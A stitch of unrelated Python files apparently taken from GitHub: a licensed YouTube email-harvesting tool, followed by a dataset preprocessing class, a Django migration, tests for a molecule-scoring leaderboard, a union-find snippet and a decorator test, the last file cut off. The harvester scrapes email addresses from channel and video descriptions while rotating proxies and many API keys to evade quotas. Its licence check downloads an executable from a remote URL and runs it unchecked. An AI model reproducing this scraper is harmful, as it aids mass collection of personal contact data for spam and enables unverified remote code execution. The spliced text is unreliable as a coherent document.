"descriptionSnippet": self._getValue(element, ["descriptionSnippet", "runs", 0, "text"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"views": {
"precise": self._getValue(element, ["viewCountText", "simpleText"]),
"simple": self._getValue(element, ["shortViewCountText", "simpleText"]),
"approximate": self._getValue(element, ["shortViewCountText", "accessibility", "accessibilityData", "label"])
},
"duration": {
"simpleText": self._getValue(element, ["lengthText", "simpleText"]),
"text": self._getValue(element, ["lengthText", "accessibility", "accessibilityData", "label"])
},
"published": self._getValue(element, ["publishedTimeText", "simpleText"]),
"channel": {
"name": self._getValue(element, ["ownerText", "runs", 0, "text"]),
"thumbnails": self._getValue(element, ["channelThumbnailSupportedRenderers", "channelThumbnailWithLinkRenderer", "thumbnail", "thumbnails"])
},
"type": responsetype
}
elif responsetype == 'playlist':
json = {
"id": self._getValue(element, ["playlistId"]),
"videos": self._getVideoFromChannelSearch(self._getValue(element, ["videos"])),
"thumbnails": {
"normal": self._getValue(element, ["thumbnails"]),
},
"title": self._getValue(element, ["title", "simpleText"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"channel": {
"name": self._getValue(element, ["longBylineText", "runs", 0, "text"]),
},
"type": responsetype
}
else:
json = {
"id": self._getValue(element, ["playlistId"]),
"thumbnails": {
"normal": self._getValue(element, ["thumbnail", "thumbnails", 0]),
},
"title": self._getValue(element, ["title", "runs", 0, "text"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"type": 'playlist'
}
channelsearch.append(json)
return channelsearch
def _getShelfComponent(self, element: dict) -> dict:
shelf = element[shelfElementKey]
return {
'title': self._getValue(shelf, ['title', 'simpleText']),
'elements': self._getValue(shelf, ['content', 'verticalListRenderer', 'items']),
}
def _getValue(self, source: dict, path: List[str]) -> Union[str, int, dict, None]:
value = source
for key in path:
if type(key) is str:
if key in value.keys():
value = value[key]
else:
value = None
break
elif type(key) is int:
if len(value) != 0:
value = value[key]
else:
value = None
break
return value
class RequestHandler(ComponentHandler):
def _makeRequest(self) -> None:
''' Fixes #47 '''
requestBody = copy.deepcopy(requestPayload)
requestBody['query'] = self.query
requestBody['client'] = {
'hl': self.language,
'gl': self.region,
}
if self.searchPreferences:
requestBody['params'] = self.searchPreferences
if self.continuationKey:
requestBody['continuation'] = self.continuationKey
requestBodyBytes = json.dumps(requestBody).encode('utf_8')
request = Request(
'https://www.youtube.com/youtubei/v1/search' + '?' + urlencode({
'key': searchKey,
}),
data = requestBodyBytes,
headers = {
'Content-Type': 'application/json; charset=utf-8',
'Content-Length': len(requestBodyBytes),
'User-Agent': userAgent,
}
)
try:
self.response = urlopen(request, timeout=self.timeout).read().decode('utf_8')
except (Exception,):
return self._makeRequest()
def _parseSource(self) -> None:
try:
if not self.continuationKey:
responseContent = self._getValue(json.loads(self.response), contentPath)
else:
responseContent = self._getValue(json.loads(self.response), continuationContentPath)
if responseContent:
for element in responseContent:
if itemSectionKey in element.keys():
self.responseSource = self._getValue(element, [itemSectionKey, 'contents'])
if continuationItemKey in element.keys():
self.continuationKey = self._getValue(element, continuationKeyPath)
else:
self.responseSource = self._getValue(json.loads(self.response), fallbackContentPath)
self.continuationKey = self._getValue(self.responseSource[-1], continuationKeyPath)
except:
raise Exception('ERROR: Could not parse YouTube response.')
class RequestCore:
def __init__(self):
self.url = None
self.data = None
self.timeout = 2
self.proxy = []
proxy = open("proxy.txt", "r").read().splitlines()
for p in proxy:
p_split = p.split(':')
if len(p_split) == 2:#ip:port
self.proxy.append({"http://": "http://"+p})
elif len(p_split) == 4:#ip:port:login:password
self.proxy.append({"http://": f"http://{p_split[2]}:{p_split[3]}@{p_split[0]}:{p_split[1]}"})
elif '@' in p:#login:password@ip:port
self.proxy.append({"http://": "http://"+p})
def syncPostRequest(self) -> httpx.Response:
try:
r = httpx.post(
self.url,
headers={"User-Agent": userAgent},
json=self.data,
timeout=self.timeout,
proxies=random.choice(self.proxy)
)
if r.status_code == 200:
return r
else:
return self.syncPostRequest()
except (Exception,):
return self.syncPostRequest()
async def asyncPostRequest(self) -> httpx.Response:
try:
async with httpx.AsyncClient(proxies=random.choice(self.proxy)) as client:
r = await client.post(self.url, headers={"User-Agent": userAgent}, json=self.data, timeout=self.timeout)
if r.status_code == 200:
return r
else:
return self.asyncPostRequest()
except (Exception,):
return await self.asyncPostRequest()
def syncGetRequest(self) -> httpx.Response:
try:
r = httpx.get(self.url, headers={"User-Agent": userAgent}, timeout=self.timeout,
cookies={'CONSENT': 'YES+1'}, proxies=random.choice(self.proxy))
if r.status_code == 200:
return r
else:
return self.syncGetRequest()
except (Exception,):
return self.syncGetRequest()
async def asyncGetRequest(self) -> httpx.Response:
try:
async with httpx.AsyncClient(proxies=random.choice(self.proxy)) as client:
r = await client.get(self.url, headers={"User-Agent": userAgent}, timeout=self.timeout,
cookies={'CONSENT': 'YES+1'})
if r.status_code == 200:
return r
else:
return await self.asyncGetRequest()
except (Exception,):
return await self.asyncGetRequest()
class VideoCore(RequestCore):
def __init__(self, videoLink: str, componentMode: str, resultMode: int, timeout: int, enableHTML: bool, overridedClient: str = "ANDROID"):
super().__init__()
self.timeout = timeout
self.resultMode = resultMode
self.componentMode = componentMode
self.videoLink = videoLink
self.enableHTML = enableHTML
self.overridedClient = overridedClient
# We call this when we use only HTML
def post_request_only_html_processing(self):
self.__getVideoComponent(self.componentMode)
self.result = self.__videoComponent
def post_request_processing(self):
self.__parseSource()
self.__getVideoComponent(self.componentMode)
self.result = self.__videoComponent
def prepare_innertube_request(self):
self.url = 'https://www.youtube.com/youtubei/v1/player' + "?" + urlencode({
'key': searchKey,
'contentCheckOk': True,
'racyCheckOk': True,
"videoId": getVideoId(self.videoLink)
})
self.data = copy.deepcopy(CLIENTS[self.overridedClient])
async def async_create(self):
self.prepare_innertube_request()
response = await self.asyncPostRequest()
self.response = response.text
if response.status_code == 200:
self.post_request_processing()
else:
raise Exception('ERROR: Invalid status code.')
def sync_create(self):
self.prepare_innertube_request()
response = self.syncPostRequest()
self.response = response.text
if response.status_code == 200:
self.post_request_processing()
else:
raise Exception('ERROR: Invalid status code.')
def prepare_html_request(self):
self.url = 'https://www.youtube.com/youtubei/v1/player' + "?" + urlencode({
'key': searchKey,
'contentCheckOk': True,
'racyCheckOk': True,
"videoId": getVideoId(self.videoLink)
})
self.data = CLIENTS["MWEB"]
def sync_html_create(self):
self.prepare_html_request()
response = self.syncPostRequest()
self.HTMLresponseSource = response.json()
async def async_html_create(self):
self.prepare_html_request()
response = await self.asyncPostRequest()
self.HTMLresponseSource = response.json()
def __parseSource(self) -> None:
try:
self.responseSource = json.loads(self.response)
except Exception as e:
raise Exception('ERROR: Could not parse YouTube response.')
def __result(self, mode: int) -> Union[dict, str]:
if mode == ResultMode.dict:
return self.__videoComponent
elif mode == ResultMode.json:
return json.dumps(self.__videoComponent, indent=4)
def __getVideoComponent(self, mode: str) -> None:
videoComponent = {}
if mode in ['getInfo', None]:
try:
responseSource = self.responseSource
except:
responseSource = None
if self.enableHTML:
responseSource = self.HTMLresponseSource
component = {
'id': getValue(responseSource, ['videoDetails', 'videoId']),
'title': getValue(responseSource, ['videoDetails', 'title']),
'duration': {
'secondsText': getValue(responseSource, ['videoDetails', 'lengthSeconds']),
},
'viewCount': {
'text': getValue(responseSource, ['videoDetails', 'viewCount'])
},
'thumbnails': getValue(responseSource, ['videoDetails', 'thumbnail', 'thumbnails']),
'description': getValue(responseSource, ['videoDetails', 'shortDescription']),
'channel': {
'name': getValue(responseSource, ['videoDetails', 'author']),
'id': getValue(responseSource, ['videoDetails', 'channelId']),
},
'allowRatings': getValue(responseSource, ['videoDetails', 'allowRatings']),
'averageRating': getValue(responseSource, ['videoDetails', 'averageRating']),
'keywords': getValue(responseSource, ['videoDetails', 'keywords']),
'isLiveContent': getValue(responseSource, ['videoDetails', 'isLiveContent']),
'publishDate': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'publishDate']),
'uploadDate': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'uploadDate']),
'isFamilySafe': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'isFamilySafe']),
'category': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'category']),
}
component['isLiveNow'] = component['isLiveContent'] and component['duration']['secondsText'] == "0"
component['link'] = 'https://www.youtube.com/watch?v=' + component['id']
component['channel']['link'] = 'https://www.youtube.com/channel/' + component['channel']['id']
videoComponent.update(component)
if mode in ['getFormats', None]:
videoComponent.update(
{
"streamingData": getValue(self.responseSource, ["streamingData"])
}
)
if self.enableHTML:
videoComponent["publishDate"] = getValue(self.HTMLresponseSource, ['microformat', 'playerMicroformatRenderer', 'publishDate'])
videoComponent["uploadDate"] = getValue(self.HTMLresponseSource, ['microformat', 'playerMicroformatRenderer', 'uploadDate'])
self.__videoComponent = videoComponent
class ResultMode:
json = 0
dict = 1
class SearchMode:
videos = 'EgIQAQ%3D%3D'
channels = 'EgIQAg%3D%3D'
playlists = 'EgIQAw%3D%3D'
livestreams = 'EgJAAQ%3D%3D'
class Video:
@staticmethod
def get(videoLink: str, mode: int = ResultMode.dict, timeout: int = None, get_upload_date: bool = False) -> Union[
dict, str, None]:
vc = VideoCore(videoLink, None, mode, timeout, get_upload_date)
if get_upload_date:
vc.sync_html_create()
vc.sync_create()
return vc.result
class ChannelSearchCore(RequestCore, ComponentHandler):
response = None
responseSource = None
resultComponents = []
def __init__(self, query: str, language: str, region: str, searchPreferences: str, browseId: str, timeout: int):
super().__init__()
self.query = query
self.language = language
self.region = region
self.browseId = browseId
self.searchPreferences = searchPreferences
self.continuationKey = None
self.timeout = timeout
def sync_create(self):
self._syncRequest()
self._parseChannelSearchSource()
self.response = self._getChannelSearchComponent(self.response)
async def next(self):
await self._asyncRequest()
self._parseChannelSearchSource()
self.response = self._getChannelSearchComponent(self.response)
return self.response
def _parseChannelSearchSource(self) -> None:
try:
last_tab = self.response["contents"]["twoColumnBrowseResultsRenderer"]["tabs"][-1]
if 'expandableTabRenderer' in last_tab:
self.response = last_tab["expandableTabRenderer"]["content"]["sectionListRenderer"]["contents"]
else:
tab_renderer = last_tab["tabRenderer"]
if 'content' in tab_renderer:
self.response = tab_renderer["content"]["sectionListRenderer"]["contents"]
else:
self.response = []
except:
raise Exception('ERROR: Could not parse YouTube response.')
def _getRequestBody(self):
''' Fixes #47 '''
requestBody = copy.deepcopy(requestPayload)
requestBody['query'] = self.query
requestBody['client'] = {
'hl': self.language,
'gl': self.region,
}
requestBody['params'] = self.searchPreferences
requestBody['browseId'] = self.browseId
self.url = 'https://www.youtube.com/youtubei/v1/browse' + '?' + urlencode({
'key': searchKey,
})
self.data = requestBody
def _syncRequest(self) -> None:
''' Fixes #47 '''
self._getRequestBody()
request = self.syncPostRequest()
try:
self.response = request.json()
except:
raise Exception('ERROR: Could not make request.')
async def _asyncRequest(self) -> None:
''' Fixes #47 '''
self._getRequestBody()
request = await self.asyncPostRequest()
try:
self.response = request.json()
except:
raise Exception('ERROR: Could not make request.')
def result(self, mode: int = ResultMode.dict) -> Union[str, dict]:
'''Returns the search result.
Args:
mode (int, optional): Sets the type of result. Defaults to ResultMode.dict.
Returns:
Union[str, dict]: Returns JSON or dictionary.
'''
if mode == ResultMode.json:
return json.dumps({'result': self.response}, indent=4)
elif mode == ResultMode.dict:
return {'result': self.response}
class SearchCore(RequestCore, RequestHandler, ComponentHandler):
response = None
responseSource = None
resultComponents = []
def __init__(self, query: str, limit: int, language: str, region: str, searchPreferences: str, timeout: int):
super().__init__()
self.query = query
self.limit = limit
self.language = language
self.region = region
self.searchPreferences = searchPreferences
self.timeout = timeout
self.continuationKey = None
def sync_create(self):
self._makeRequest()
self._parseSource()
def _getRequestBody(self):
''' Fixes #47 '''
requestBody = copy.deepcopy(requestPayload)
requestBody['query'] = self.query
requestBody['client'] = {
'hl': self.language,
'gl': self.region,
}
if self.searchPreferences:
requestBody['params'] = self.searchPreferences
if self.continuationKey:
requestBody['continuation'] = self.continuationKey
self.url = 'https://www.youtube.com/youtubei/v1/search' + '?' + urlencode({
'key': searchKey,
})
self.data = requestBody
def _makeRequest(self) -> None:
self._getRequestBody()
request = self.syncPostRequest()
try:
self.response = request.text
except:
raise Exception('ERROR: Could not make request.')
async def _makeAsyncRequest(self) -> None:
self._getRequestBody()
request = await self.asyncPostRequest()
try:
self.response = request.text
except:
raise Exception('ERROR: Could not make request.')
def result(self, mode: int = ResultMode.dict) -> Union[str, dict]:
if mode == ResultMode.json:
return json.dumps({'result': self.resultComponents}, indent=4)
elif mode == ResultMode.dict:
return {'result': self.resultComponents}
def _next(self) -> bool:
if self.continuationKey:
self.response = None
self.responseSource = None
self.resultComponents = []
self._makeRequest()
self._parseSource()
self._getComponents(*self.searchMode)
return True
else:
return False
async def _nextAsync(self) -> dict:
self.response = None
self.responseSource = None
self.resultComponents = []
await self._makeAsyncRequest()
self._parseSource()
self._getComponents(*self.searchMode)
return {
'result': self.resultComponents,
}
def _getComponents(self, findVideos: bool, findChannels: bool, findPlaylists: bool) -> None:
self.resultComponents = []
for element in self.responseSource:
if videoElementKey in element.keys() and findVideos:
self.resultComponents.append(self._getVideoComponent(element))
if channelElementKey in element.keys() and findChannels:
self.resultComponents.append(self._getChannelComponent(element))
if shelfElementKey in element.keys() and findVideos:
for shelfElement in self._getShelfComponent(element)['elements']:
self.resultComponents.append(
self._getVideoComponent(shelfElement, shelfTitle=self._getShelfComponent(element)['title']))
if richItemKey in element.keys() and findVideos:
richItemElement = self._getValue(element, [richItemKey, 'content'])
if videoElementKey in richItemElement.keys():
videoComponent = self._getVideoComponent(richItemElement)
self.resultComponents.append(videoComponent)
if len(self.resultComponents) >= self.limit:
break
class Search(SearchCore):
def __init__(self, query: str, limit: int = 20, language: str = 'en', region: str = 'US', timeout: int = None):
self.searchMode = (True, True, True)
super().__init__(query, limit, language, region, None, timeout)
self.sync_create()
self._getComponents(*self.searchMode)
def next(self) -> bool:
return self._next()
class VideosSearch(SearchCore):
def __init__(self, query: str, limit: int, language: str = 'en', region: str = 'US', timeout: int = None):
self.searchMode = (True, False, False)
super().__init__(query, limit, language, region, SearchMode.videos, timeout)
self.sync_create()
self._getComponents(*self.searchMode)
def next(self) -> bool:
return self._next()
class ChannelSearch(ChannelSearchCore):
def __init__(self, query: str, browseId: str, language: str = 'en', region: str = 'US', searchPreferences: str = "EgZzZWFyY2g%3D", timeout: int = None):
super().__init__(query, language, region, searchPreferences, browseId, timeout)
self.sync_create()
class CustomSearch(SearchCore):
def __init__(self, query: str, searchPreferences: str, limit: int = 20, language: str = 'en', region: str = 'US', timeout: int = None):
self.searchMode = (True, True, True)
super().__init__(query, limit, language, region, searchPreferences, timeout)
self.sync_create()
self._getComponents(*self.searchMode)
def next(self):
self._next()
init()
logger.remove() # Удаляем стандартный обработчик
logger.add(sink=sys.stdout,
format='<green>{time:YYYY-MM-DD HH:mm:ss.SSS}</green> | <level>{level: <8}</level> | <level>{message}</level>')
re_year = '"publishedAt": "(.*)",'
re_onlyyear= r'^(\d+)-'
re_email = '(?:[A-Za-z0-9!#$%&\'*+\\/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&\'*+\\/=?^_`{|}~-]+)*|\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])'
class Engine():
def __init__(self):
check = requests.post('https://api.ytmailer.pro/index.php',data={'hwid':HWID})
if check.status_code == 200:
check = json.loads(check.text)
if check['status'] == True:
hwid_new = check['hwid']
salt = 'ytsoft139392924992491dds'
if (hashlib.md5((HWID+salt).encode())).hexdigest() != hwid_new:
sys.exit()
else:
check_v = requests.post('https://api.ytmailer.pro/index.php',data={'hwid':HWID,'version':__version__}).json()
if check_v['status']:
logger.success(f'Найдена новая версия.. Обновляемся ({check_v["version"]})')
with open(f'YTparser-{check_v["version"]}.exe','wb') as file:
file.write(requests.get(check_v['url']).content)
os.system(f'YTparser-{check_v["version"]}.exe')
sys.exit()
else:
logger.info(f'Ваш HWID: {HWID}')
logger.error('У вас нет подписки! Отправьте ваш HWID продавцу')
input()
sys.exit()
else:
logger.error('Сервер на тех. Работах. Нажмите любую кнопку!')
input()
sys.exit()
self.apis = self.read_file("API.txt")
self.keys = self.read_file("keywords.txt")
self.blackwords = self.read_file("blackwords.txt")
self.proxys = self.read_file('proxy.txt')
self.emails = 0
os.system('title "@wxkssy | Tg bot: @qualityshop24_bot"')
num_threads = int(input(Fore.GREEN + '> Enter number of threads: ' + Style.RESET_ALL))
self.videocount = 0
while (True):
self.year = input(Fore.GREEN + '> Enter max channel reg-year: ' + Style.RESET_ALL)
if self.year.isdigit():
self.year = int(self.year)
if (self.year > 2000):
break
while (True):
self.views = input(Fore.GREEN + '> Enter min channel views: ' + Style.RESET_ALL)
if self.views.isdigit():
self.views = int(self.views)
break
while True:
self.subs = input(Fore.GREEN + '> Enter min & max subs: ' + Style.RESET_ALL)
if not '-' in self.subs:
self.subs = input(Fore.GREEN + '> Enter min & max subs: ' + Style.RESET_ALL)
else:
self.subs = [int(self.subs.split('-')[0]), int(self.subs.split('-')[1])]
if (self.subs[0] < self.subs [1]):
break
self.blacklist = input(Fore.GREEN + '> Enter blacklist (y/n): ' + Style.RESET_ALL)
if self.blacklist.lower() != 'y':
self.blackwords = ''
logger.info(f'Max Year: {self.year} | Min Views: {self.views} | Subs: {self.subs[0]}-{self.subs[1]}')
sleep(1)
threads = []
for i in range(num_threads):
t = threading.Thread(target=self.process_data)
threads.append(t)
for t in threads:
t.start()
threading.Thread(target=self.console_log).start()
for t in threads:
t.join()
logger.info('Данные закончились, завершение...')
input("Нажми ENTER, чтобы завершить")
def read_file(self,filename):
with open(filename, 'r',encoding='utf-8',errors='ignore') as f:
return f.read().split('\n')
def process_data(self):
proxies = {
'http': f'http://{random.choice(self.proxys)}',
}
while True:
try:
if self.apis == [] or self.keys == []:
break
api = random.choice(self.apis)
key = random.choice(self.keys)
search = VideosSearch(key, limit=50)
try:
self.keys.remove(str(key))
except:
pass
videoIds = search.result()
while True:
try:
for videoID in videoIds['result']:
description = ''
if videoID['descriptionSnippet'] != None:
for _ in videoID['descriptionSnippet']:
description += _['text'] + ' '
email = re.findall(re_email, description)
channelId = videoID['channel']['id']
while True:
try:
api = random.choice(self.apis)
resp = requests.get(f'https://www.googleapis.com/youtube/v3/channels?part=statistics%2Csnippet&maxResults=50&id={channelId}&key={str(api)}',proxies=proxies)
if resp.status_code == 200:
resp_rez = resp.json()["items"][0]
break
else:
try:
self.apis.remove(api)
except:
pass
if self.apis == []:
break
except:
proxies = {
'http': f'http://{random.choice(self.proxys)}',
}
if self.apis == []:
return
while True:
try:
vid = videoID['id']
except:
res3 = []
break
try:
api = random.choice(self.apis)
resp = requests.get(f"https://youtube.googleapis.com/youtube/v3/videos?part=snippet&part=contentDetails&part=statistics&id={vid}&key={api}",proxies=proxies)
if resp.status_code == 200:
res3 = re.findall(re_email, resp.text.replace(r"\n", ""))
break
else:
try:
self.apis.remove(api)
except:
pass
if self.apis == []:
break
except:
proxies = {
'http': f'http://{random.choice(self.proxys)}',
}
if self.apis == []:
return
yearid = int(resp_rez['snippet']['publishedAt'][:4])
# Количество подписчиков
try:
subscount = resp_rez["statistics"]["subscriberCount"]
except Exception:
subscount = 0
try:
viewscount = resp_rez["statistics"]["viewCount"]
except:
viewscount = 0
try:
countryId = resp_rez["snippet"]["country"]
except Exception:
countryId = 'Not'
if countryId in self.blackwords:
pass
else:
if res3 != []:
if self.year >= int(yearid):
if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount):
if self.views <= int(viewscount):
for mail in res3:
self.write_mail(f"emails.txt", mail)
if email != []:
if self.year >= int(yearid):
if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount):
if self.views <= int(viewscount):
for mail in email:
self.write_mail(f"emails.txt", mail)
# описание канала
try:
descriptionCN = resp_rez["snippet"]["description"]
except Exception:
descriptionCN = ''
emailDesc = re.findall(re_email, descriptionCN)
if emailDesc != []:
if self.year >= int(yearid):
if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount):
if self.views <= int(viewscount):
for mail in emailDesc:
self.write_mail(f"emails.txt", mail)
self.videocount += 1
try:
search.next()
videoIds = search.result()
except:
break
nextpage = len(videoIds['result'])
if nextpage == 0:
break
except:
pass
except:
pass
def write_mail(self,filename, data):
x = self.read_file(filename)
with open(filename, 'a+',encoding='utf-8') as f:
if data not in x:
f.write(str(data) + '\n')
self.emails += 1
def console_log(self):
while True:
os.system('cls' if os.name == 'nt' else 'clear')
logger.info(f'ApiKeys: {len(self.apis)} | KeyWords: {len(self.keys)} | Emails: {self.emails} | Video_seen: {self.videocount}')
sleep(5)
Engine()
|
basautomaticaly/work
|
main2-5.py
|
main2-5.py
|
py
| 46,695 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30609616360
|
import numpy as np
import os
import Tools.FilesTool as FilesTool
import imblearn.over_sampling as over_sampling
class DataSetTool:
# 08版的度量补偿
# Mij in Target = (Mij in Target * Mean(Mj in Source)) / Mean(Mj) in Target
@staticmethod
def metric_compensation(source, target):
# 遍历每一个度量属性
for j in range(target.shape[1]):
# 计算每个度量属性的均值
metric_mean_source = np.mean(source[:, j])
metric_mean_target = np.mean(target[:, j])
# 遍历每一个样例
for i in range(target.shape[0]):
target[i, j] = (target[i, j] * metric_mean_source) / metric_mean_target
return target
# 17版进行调整的度量补偿
# Mij in Source = (Mij in Source * Mean(Mj in Target)) / Mean(Mj) in Source
@staticmethod
def metric_compensation_adopt(source, target):
# 遍历每一个度量属性
for j in range(source.shape[1]):
# 计算每个度量属性的均值
metric_mean_source = np.mean(source[:, j])
metric_mean_target = np.mean(target[:, j])
# 遍历每一个样例
for i in range(source.shape[0]):
source[i, j] = (source[i, j] * metric_mean_target) / metric_mean_source
return source
# 读取文件夹下的所有文件,并返回处理好的数据集
# metrics_num 度量数目(原始数据中除开标签列的列数)
# is_sample 是否重采样
# is_normalized 是否数据归一化
@staticmethod
def init_data(folder_path, metrics_num, is_sample=True, is_normalized=True):
# 获取目录下所有原始文件
files = os.listdir(folder_path)
data_list, label_list = [], []
for file in files:
# 每一个子文件的真实路径
file_path = folder_path+file
# txt文件
if 'txt' == FilesTool.file_type(file) or 'TXT' == FilesTool.file_type(file):
# 直接读取文件
data_file = np.loadtxt(file_path, dtype=float, delimiter=',', usecols=range(0, metrics_num+1))
label_file = np.loadtxt(file_path, dtype=float, delimiter=',', usecols=metrics_num+1)
if is_normalized:
# 数据归一化
data_file -= data_file.min()
data_file /= data_file.max()
label_file -= label_file.min()
label_file /= label_file.max()
# 加入列表
data_list.append(data_file)
label_list.append(label_file)
# 重采样
if is_sample:
for index in range(len(data_list)):
data_list[index], label_list[index] = over_sampling.SMOTE(kind='regular').fit_sample(data_list[index],
label_list[index])
return data_list, label_list
|
ylxieyu/HYDRA
|
DataSetTool.py
|
DataSetTool.py
|
py
| 3,100 |
python
|
en
|
code
| 5 |
github-code
|
6
|
70675296187
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from ..pki.migrate_data import migrate_pki_data
class Migration(migrations.Migration):
dependencies = [
('ssl_pki', '0002_default_config'),
]
operations = [
migrations.RunPython(migrate_pki_data, migrations.RunPython.noop),
]
|
ngageoint/exchange
|
exchange/sslpki/migrations/0001_migrate_pki_data.py
|
0001_migrate_pki_data.py
|
py
| 361 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71087023548
|
"""
Tests for the server.
Before running them, the server database should be restarted.
Run as: python server/tests/test_all.py (don't use py.test as it does not pass env variables easily)
"""
import os
import shutil
from pathlib import Path
from typing import List
import pytest
from requests.exceptions import HTTPError
import numpy as np
from src.al_loop import LeadCompound
from server.app import WORKSHOP_ORACLES
from solutions.task1.random_loop import RandomLoop
from src.server_wrapper import FlaskAppClient
from rich.console import Console
console = Console()
PORT = int(os.environ.get("PORT", "5000"))
BASE_URL = "http://127.0.0.1:" + str(PORT)
BASE_URL = "http://mlinpl23.ngrok.io"
TEST_TOKEN_PREFIX = 'test-' # test-0, test-1, ...
def test_submitting_compounds_to_workshop_oracles():
"""Submits three simple molecules to the server using token test-0, to all workshop oracles."""
client = FlaskAppClient(base_url=BASE_URL)
token = TEST_TOKEN_PREFIX + '0'
# Example for scoring compounds
for oracle in WORKSHOP_ORACLES:
compounds = ["CCCCCCCCC", "CCCCCCCC", "CCCCCC=O"]
response = client.score_compounds_and_update_leaderboard(compounds, oracle, token)
print(response)
assert "metrics" in response
assert "compound_scores" in response
assert "compound_sas_scores" in response
def _run_random_exploration(protein, token="test-1", steps=10):
"""Simple random exploration of ZINC. Should get above >0.5 score on each oracle."""
base_dir = Path("tmp")
shutil.rmtree(base_dir, ignore_errors=True)
client = FlaskAppClient(base_url=BASE_URL)
loop = RandomLoop(base_dir=base_dir,
user_token=token,
target=protein)
all_result: List[LeadCompound] = []
budget_per_step = 100
for step in range(steps):
console.print(f"[red]Step {step}[/red]")
candidates = loop.propose_candidates(budget_per_step)
loop.test_in_lab_and_save(candidates, client=client)
result: List[LeadCompound] = loop.load(iteration_id=step)
all_result += result
all_result_sorted = sorted(all_result, key=lambda x: x.activity, reverse=True)
metrics = {"top10": np.mean([x.activity for x in all_result_sorted[:10]]),
"top10_synth": np.mean([x.synth_score for x in all_result_sorted[:10]])}
console.log(metrics)
return metrics
def test_random_exploration_gets_reasonable_score():
for protein in [ 'GSK3β', 'DRD2_server', 'JNK3']:
console.log("Testing: " + protein)
metrics = _run_random_exploration(protein=protein)
assert metrics['top10'] > 0.1, "Random search should identify reasonable compounds"
def test_leaderboard_ordering_and_user_names():
_run_random_exploration('DRD2_server', 'test-2', steps=1)
_run_random_exploration('DRD2_server', 'test-3', steps=1)
client = FlaskAppClient(base_url=BASE_URL)
all_results = client.all_results()
users = [r['user'] for r in all_results]
print(users)
assert 'user-2' in users
assert 'user-3' in users
all_proteins = ['DRD2', 'JNK3', 'GSK3β']
sums = [sum([all_results[0]['metrics'][p + "_top_10"] for p in all_proteins]) for r in all_results]
assert sums[0] == max(sums), "First result in the leaderboard should be the maximum sum of top10 scores"
def test_call_limits():
base_dir = Path("tmp")
token = 'test-10'
shutil.rmtree(base_dir, ignore_errors=True)
loop = RandomLoop(base_dir=base_dir,
user_token=token,
target='DRD2')
client = FlaskAppClient(base_url=BASE_URL)
# exhaust limit
candidates = loop.propose_candidates(1000)
loop.test_in_lab_and_save(candidates, client=client)
# run one time more
candidates = loop.propose_candidates(100)
with pytest.raises(RuntimeError):
client.score_compounds_and_update_leaderboard([c.smiles for c in candidates], user_token=token, oracle_name='DRD2')
def test_get_all_scores():
base_dir = Path("tmp")
token = 'test-40'
shutil.rmtree(base_dir, ignore_errors=True)
loop = RandomLoop(base_dir=base_dir,
user_token=token,
target='GSK3β_server')
client = FlaskAppClient(base_url=BASE_URL)
# exhaust limit
candidates = loop.propose_candidates(100)
candidates = loop.test_in_lab_and_save(candidates, client=client)
# run one time more
console.log(client.all_scores(token))
assert len(client.all_scores(token)['compound_sas_scores']['GSK3β']) == len(candidates)
assert len(client.all_scores(token)['compound_scores']['GSK3β']) == len(candidates)
if __name__ == "__main__":
test_submitting_compounds_to_workshop_oracles()
test_random_exploration_gets_reasonable_score()
test_leaderboard_ordering_and_user_names()
test_call_limits()
test_get_all_scores()
console.log("[green] Tests passed [/green]")
|
molecule-one/mlinpl-23-workshops
|
server/tests/test_all.py
|
test_all.py
|
py
| 4,995 |
python
|
en
|
code
| 1 |
github-code
|
6
|
13954857960
|
par=[]
for i in range(100):
par.append(i)
def find(u):
if u==par[u]:
return u
par[u]=find(par[u]) # Path Compression, 경로 압축
return par[u]
def merge(u,v):
u,v=find(u),find(v)
if u==v:
return
par[u]=v # without Union-By-Rank
merge(1,5)
merge(2,5)
merge(4,1)
print(find(5)==find(4))
print(find(0)==find(1))
|
MilkClouds/SCSC-2019
|
서로소 집합.py
|
서로소 집합.py
|
py
| 359 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38093772023
|
from time import sleep
from HW_03.my_decorator import DecorTimeCrit
@DecorTimeCrit(critical_time=0.45)
class Test:
def method_1(self):
print('slow method start')
sleep(1)
print('slow method finish')
def method_2(self):
print('fast method start')
sleep(0.1)
print('fast method finish')
def execute_time_method_check():
t = Test()
t.method_1()
t.method_2()
if __name__ == '__main__':
execute_time_method_check()
# slow method start
# slow method finish
# WARNING! method_1 slow. Time = ??? sec.
# fast method start
# fast method finish
|
alisa-moto/python-adnanced
|
HW_03/class_for_decorator.py
|
class_for_decorator.py
|
py
| 616 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4769452267
|
#!/usr/bin/env python
import sys
import os
def deserialize_anno(parts):
# Frame name formatted as <task ID><6 digit frame ID>
frame_name = parts[0]
track_id = parts[1]
x = float(parts[2])
y = float(parts[3])
box_width = float(parts[4])
box_height = float(parts[5])
class_id = parts[7]
#print(frame_name, track_id, box_left, box_top, box_width, box_height, class_id)
